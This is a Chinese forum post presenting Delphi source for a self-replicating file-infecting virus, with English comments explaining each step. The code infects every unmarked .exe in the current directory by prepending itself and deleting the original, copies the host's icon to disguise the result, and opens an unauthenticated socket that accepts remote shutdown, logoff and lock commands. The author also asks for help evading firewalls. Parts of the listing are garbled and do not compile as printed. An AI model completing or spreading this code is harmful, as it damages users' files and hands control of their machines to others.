要源代码的朋友太多了,所以我把主要的代码公布出来。本人水平有限,如果哪位还有更好的方法,希望
不要吝啬,也公布出来大家一起研究。因为我在网络方面的编程不熟,不知道如何绕过防火墙,
希望有这方面研究的高手赐教。fly0128@sina.com.cn
fAtom: TAtom;
sr: TSearchRec;
filehandle: Hinst;
Ficon: Ticon;
const
BakDExe = 'NMD.exe';
// Backup name for the exe being infected (declared here; not referenced in the code shown).
BakExe = 'c:/sos.dll';
// Copy of this program itself: written by FormCreate, read back by InfectFile as the payload.
TmpExe = 'TMD.exe';
// Temporary output assembled by InfectFile/ChangeIcon, then renamed over the target by FormCreate.
SeparateExe = 'Separate.exe';
// Working copy of the running exe from which SeparateSelf carves out the original host program.
implementation
{$R *.dfm}
// EnumResourceNames callback used by AddFlag. It ignores its own hmodule and lparam
// arguments and reads the global filehandle instead: for the RT_ICON resource named
// lpname it finds, loads and locks the resource, builds a 32x32 icon from it and saves
// that icon to '****.ico' (file name as printed in the listing). Every invocation writes
// the same path, so the last enumerated icon is the one left on disk.
// None of the API return values are checked (findresource/loadresource/lockresource
// can return nil/0). Returns True so that the enumeration keeps going.
function Enumresname(hmodule: Hmodule;
lptype, lpname: Pchar;
lparam: longint): Bool;
stdcall;
var
hicon1: hicon;
hresource: hrsrc;
hmem: hrsrc;
lpresource: pbyte;
begin
hresource := findresource(filehandle, lpname, RT_ICON);
hmem := loadresource(filehandle, hresource);
lpresource := lockresource(hmem);
// fIcon=True, resource version $0030000, 32x32, default colour flags.
hicon1 := Createiconfromresourceex(lpresource, sizeofresource(filehandle, hresource),
True, $0030000, 32, 32, LR_DEFAULTCOLOR);
try
// Ficon is the unit-global TIcon; it is created and freed on every call.
Ficon := TIcon.Create;
Ficon.handle := hicon1;
Ficon.SaveToFile('****.ico');
finally
freeandnil(ficon);
end;
result := True;
end;
// Command handler for the listening TServerSocket (activated at the end of FormCreate;
// the port is not visible in this listing). Reads one chunk of text from the connected
// client and compares it against fixed command strings; there is no authentication,
// framing or validation, so any client able to reach the port can issue these commands.
// Comparison is exact and case-sensitive; unrecognised text is silently ignored.
procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
var
GetOrder: string;
begin
GetOrder := Socket.ReceiveText;
if GetOrder = 'ExitWindows' then
// Log off / exit Windows.
begin
ExitWindows(0, 0);
end;
//if
if GetOrder = 'LockWorkstation' then
// Lock the workstation.
begin
LockWorkStation;
end;
//if
if GetOrder = 'ShutDown' then
// Shut down the local machine ('127.0.0.1'): no message, 10000 ms timeout,
// force applications closed, no reboot afterwards.
begin
InitiateSystemShutdown('127.0.0.1', '', 10000, TRUE, FALSE);
end;
//if
if GetOrder = 'AboutShutDown' then
// Cancel a pending shutdown. The command string is spelled 'AboutShutDown'
// (presumably meant as "abort"); clients must send it exactly as written.
begin
AbortSystemShutdown('127.0.0.1');
end;
//if
if GetOrder = 'ExitWindows' then
// Duplicate of the first branch; it runs after the first ExitWindows call returns.
begin
ExitWindows(0, 0);
end;
//if
end;
// Returns True when a process whose szExeFile equals FileName (exact, case-sensitive
// string compare) appears in a Toolhelp snapshot; FormCreate uses this to skip
// executables that are currently running. pProcessInfo is declared elsewhere in the
// file. As written, the TList and the records added to it are never freed and the
// snapshot handle is never closed, so each call leaks memory and a handle.
function InspectProcess(FileName: string): bool;
var
p: pProcessInfo;
// i: integer;
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
l: TList;
inFlag: boolean;
begin
inFlag := false;
l := TList.Create;
l.Clear;
// Snapshot of everything (TH32CS_SNAPALL) rather than just processes (TH32CS_SNAPPROCESS).
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
// Line below is printed as "0do" in the listing (presumably "0 do").
while integer(ContinueLoop) <> 0do
begin
// Copy the entry into a heap record before advancing; the record is compared after
// Process32Next but was filled from the current entry, so the compare is unaffected.
New(p);
p.ExeFile := FProcessEntry32.szExeFile;
p.ProcessID := FProcessEntry32.th32ProcessID;
l.Add(p);
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
if FileName = p.ExeFile then
inFlag := true;
end;
Result := inFlag;
end;
// Marks FileName as already processed and harvests its icon. Steps:
//  1. copy the target to 'b.bak', LoadLibrary that copy and walk its RT_ICON resources
//     through Enumresname (which writes '****.ico'), then unload and delete 'b.bak';
//  2. grow the target by 18 bytes, seek to the end and append the marker string
//     'FLY0128@sina.com.cn', followed by the raw bytes of the Mysting reference
//     variable itself (WriteBuffer is handed the variable, not the stream contents).
// Flagin later searches the file tail for 'FLY' to recognise this marker.
// Note: CopyFile is called with bFailIfExists=True, so a leftover 'b.bak' makes the
// copy fail silently; and if TFileStream.Create raises, the finally block frees
// Mysting before it has been assigned.
procedure AddFlag(FileName: string);
var
f3: TFileStream;
Mysting: TStringStream;
begin
CopyFile(pchar(FileName), pchar('b.bak'), true);
// Global filehandle is what Enumresname reads; its own hmodule argument is ignored.
filehandle := LoadLibrary(pchar('b.bak'));
Enumresourcenames(filehandle, RT_ICON, @enumresname, 1);
FreeLibrary(filehandle);
DeleteFile('b.bak');
try
f3 := TFileStream.Create(FileName, fmOpenWrite);
f3.Size := f3.Size + 18;
f3.Seek(0, soFromEnd);
Mysting := TStringStream.Create('FLY0128@sina.com.cn');
// Count=0 copies the whole string stream.
f3.CopyFrom(Mysting, 0);
f3.WriteBuffer(Mysting, sizeof(Mysting));
finally
Mysting.Free;
Freeandnil(f3);
end;
end;
// Returns True when the marker written by AddFlag is present: reads 19 bytes starting
// 25 bytes before the end of FileName and checks whether 'FLY' occurs in them.
// The file is opened read-only and closed before the compare.
function Flagin(FileName: string): bool;
// Naive substring test: True when A occurs inside B. The loop header and one of the
// inc calls are garbled in this listing (printed as "for i := mdo / wnto 0do" and a
// bare "inc ;"), presumably "for i := m downto 0 do" and "inc(y)"; the code does not
// compile as printed, so the exact behaviour of this helper cannot be confirmed here.
function StrAisinStrB(A, B: string): bool;
var
m, n, i, ok, x, y: integer;
t1, t2: pchar;
begin
ok := 0;
x := 0;
y := 0;
t1 := pchar(A);
t2 := pchar(B);
m := length(string(t2));
n := length(string(t1));
for i := mdo
wnto 0do
if t2[x] = t1[y] then
begin
inc(x);
inc
;
inc(ok);
if ok = n then
break;
end else
begin
// Mismatch: restart the match count, keep scanning B.
ok := 0;
inc(x);
end;
if ok = n then
result := True
else
result := False;
end;
var
f3: TFileStream;
pData: array[0..18] of char;
tmsstr: string;
begin
f3 := TFileStream.Create(FileName, fmOpenRead);
// Negative offset from the end: the marker appended by AddFlag sits in this window.
f3.Seek(-25, soFromEnd);
f3.ReadBuffer(pData, sizeof(pData));
freeandnil(f3);
tmsstr := pData;
if StrAisinStrB('FLY', tmsstr) then
// 'FLY' is the infection marker.
Result := True
else
Result := False;
end;
// Builds the infected image in TmpExe from two inputs: BakExe (the copy of this
// program written by FormCreate) and FileName (the target). Resulting layout:
//   [BakExe bytes][4-byte length][FileName bytes][4-byte length]
// where each length is the input size plus Sizeof(f3) - note that Sizeof(f3) is the
// size of the stream reference variable, not the stream length. SeparateSelf reads
// the trailing length back to carve the original host out again.
// The finally block deletes FileName unconditionally, so the original target is
// removed even when TmpExe was not completely written; and if the first Create
// raises, f2/f3 are freed before they were ever assigned.
procedure InfectFile(FileName: string);
var
f1, f2, f3: TFileStream;
s1, s2, s3: integer;
begin
try
f1 := TFileStream.Create(BakExe, fmOpenRead or fmShareExclusive);
s1 := f1.Size;
f2 := TFileStream.Create(FileName, fmOpenRead or fmShareExclusive);
s2 := f2.Size;
f3 := TFileStream.Create(TmpExe, fmCreate or fmShareExclusive);
f3.Seek(0, soFromEnd);
// Append the whole of f1 (Count=0 copies everything).
f3.CopyFrom(f1, 0);
s3 := s1 + Sizeof(f3);
// Record the size of what was just appended, written at the tail.
f3.WriteBuffer(s3, sizeof(s3));
f3.Seek(0, soFromEnd);
// Append the whole of the target.
f3.CopyFrom(f2, 0);
s3 := s2 + Sizeof(f3);
// Record the target size, written at the tail.
f3.WriteBuffer(s3, sizeof(s3));
finally
Freeandnil(f1);
Freeandnil(f2);
Freeandnil(f3);
DeleteFile(FileName);
end;
end;
// Patches the icon harvested by Enumresname into TmpExe at a fixed file offset so the
// infected image keeps the target's appearance. The FileName parameter is not used;
// the procedure always edits TmpExe. It copies 511 bytes from offset 126 of
// '****.ico' to offset 405120 (origin 0 = from beginning) and then writes the 4-byte
// NewIcon reference variable after them. The offset is hard-coded for this program's
// own layout. If LoadFromFile raises, FileToMod is freed before being assigned.
procedure ChangeIcon(FileName: string);
var
NewIcon: TMemoryStream;
FileToMod: TFileStream;
begin
try
NewIcon := TMemoryStream.Create;
NewIcon.LoadFromFile('****.ico');
NewIcon.Position := 126;
FileToMod := TFileStream.Create(TmpExe, fmOpenReadWrite);
FileToMod.Seek(405120, 0);
// 400900: icon position (original author's note; the seek uses 405120).
FileToMod.CopyFrom(NewIcon, 511);
FileToMod.WriteBuffer(NewIcon, sizeof(NewIcon));
finally
freeandnil(FileToMod);
freeandnil(NewIcon);
end;
end;
// Run when this program is executing as an infected host (see FormCreate): copies the
// running exe to SeparateExe, reads the 4-byte length stored at its tail (the value
// InfectFile wrote for the target), seeks back that far, copies length-4 bytes out
// as 'run.exe', deletes SeparateExe and launches 'run.exe' maximised. The dropped
// 'run.exe' is therefore the original host program, which is why it still appears
// to run normally. Artifacts left in the working directory: 'run.exe'.
procedure SeparateSelf;
var
s2: integer;
Source: TFileStream;
Target: TMemoryStream;
begin
// Separate self out and produce the original file.
// bFailIfExists=False: an existing SeparateExe is overwritten.
CopyFile(pchar(Application.exename), SeparateExe, false);
s2 := 441344;
// Original author's note: "length of the virus itself". This value is dead - it is
// overwritten by the ReadBuffer below before it is used.
Target := TMemoryStream.Create;
Source := TFileStream.Create(SeparateExe, fmOpenRead or fmShareDenyNone);
try
Source.Seek(-sizeof(s2), soFromEnd);
Source.ReadBuffer(s2, sizeof(s2));
// Read the stored payload size from the last 4 bytes.
Source.Seek(-s2, soFromEnd);
// Position at the start of the payload.
// Payload is s2 minus the 4-byte length field (assumes the length was stored as
// size+4, i.e. Sizeof of a 32-bit reference in InfectFile).
Target.CopyFrom(Source, s2 - sizeof(s2));
// Extract the payload.
Target.SaveToFile('run.exe');
// Save it to a file.
finally
Target.Free;
Source.Free;
end;
DeleteFile(SeparateExe);
winexec(pchar('run.exe'), SW_MAXIMIZE);
//
end;
// Entry point of the program's behaviour. Sequence:
//  1. (disabled) single-instance check via a global atom named '**** U' (masked in the
//     listing);
//  2. if the running exe is not named 'Server.exe' it is an infected host, so the
//     original program is carved out and started (SeparateSelf); otherwise this exe is
//     copied to BakExe ('c:/sos.dll'). Execution continues into step 3 in both cases;
//  3. every '*.exe' in the current directory (FindFirst with no path) is processed,
//     except 'run.exe', 'WinMon.exe', anything currently running, and anything already
//     carrying the marker: AddFlag, InfectFile, ChangeIcon, then TmpExe is renamed
//     over the original name;
//  4. the TServerSocket is activated, exposing ServerSocket1ClientRead's commands.
// Detection-relevant artifacts produced here: 'c:/sos.dll', 'TMD.exe', 'b.bak',
// '****.ico', 'run.exe', 'Separate.exe', and the 'FLY0128@sina.com.cn' marker at
// the tail of processed executables.
procedure TForm1.FormCreate(Sender: TObject);
begin
{
if GlobalFindAtom('**** U') = 0 then
begin
fAtom := GlobalAddAtom('**** U');
end else
Application.Terminate;
}
if ExtractFileName(Application.ExeName) <> 'Server.exe' then
begin
// Running inside an infected host: extract and launch the original program.
SeparateSelf;
end else
begin
// Running as the original 'Server.exe': keep a copy to use as the payload.
CopyFile(pchar(Application.exename), BakExe, false);
end;
if FindFirst('*.exe', faAnyFile, sr) = 0 then
begin
repeat
if (sr.Name <> 'run.exe') then
if (sr.Name <> 'WinMon.exe') then
if not InspectProcess(sr.Name) then
// Skip executables that are currently running.
if not Flagin(sr.Name) then
// File does not carry the marker yet.
begin
AddFlag(sr.Name);
// Write the marker (and harvest the icon).
InfectFile(sr.Name);
// Build TmpExe from payload + original; the original is deleted.
ChangeIcon(sr.Name);
// Patch the harvested icon into TmpExe, then put TmpExe in the original's place.
RenameFile(TmpExe, sr.Name);
end;
until
FindNext(sr) <> 0;
FindClose(sr);
end;
//if
// Start listening for remote commands (port configured outside this listing).
ServerSocket1.Active := true;
end;
公布的主要是程序自我复制的功能。